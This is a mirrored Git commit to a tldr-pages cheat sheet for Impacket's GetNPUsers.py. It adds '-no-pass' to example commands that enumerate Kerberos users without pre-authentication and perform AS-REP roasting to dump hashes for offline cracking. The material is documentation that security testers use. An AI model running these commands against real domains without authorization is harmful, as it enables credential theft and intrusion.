mirror of
https://github.com/tldr-pages/tldr.git
synced 2026-08-28 19:54:09 +08:00
GetNPUsers.py: fix examples (#16864)
This commit is contained in:
@@ -6,11 +6,11 @@
|
||||
|
||||
- Enumerate users with Kerberos pre-authentication disabled (default anonymous enumeration):
|
||||
|
||||
`GetNPUsers.py {{domain}}/ -usersfile {{path/to/userslist}} -dc-ip {{domain_controller_ip}}`
|
||||
`GetNPUsers.py {{domain}}/ -usersfile {{path/to/userslist}} -dc-ip {{domain_controller_ip}} -no-pass`
|
||||
|
||||
- Perform AS-REP roasting and dump crackable hashes for offline cracking:
|
||||
|
||||
`GetNPUsers.py {{domain}}/ -usersfile {{path/to/userslist}} -dc-ip {{domain_controller_ip}} -request`
|
||||
`GetNPUsers.py {{domain}}/ -usersfile {{path/to/userslist}} -dc-ip {{domain_controller_ip}} -no-pass -request`
|
||||
|
||||
- Authenticate with valid credentials (if anonymous binding is disabled):
|
||||
|
||||
|
||||
Reference in New Issue
Block a user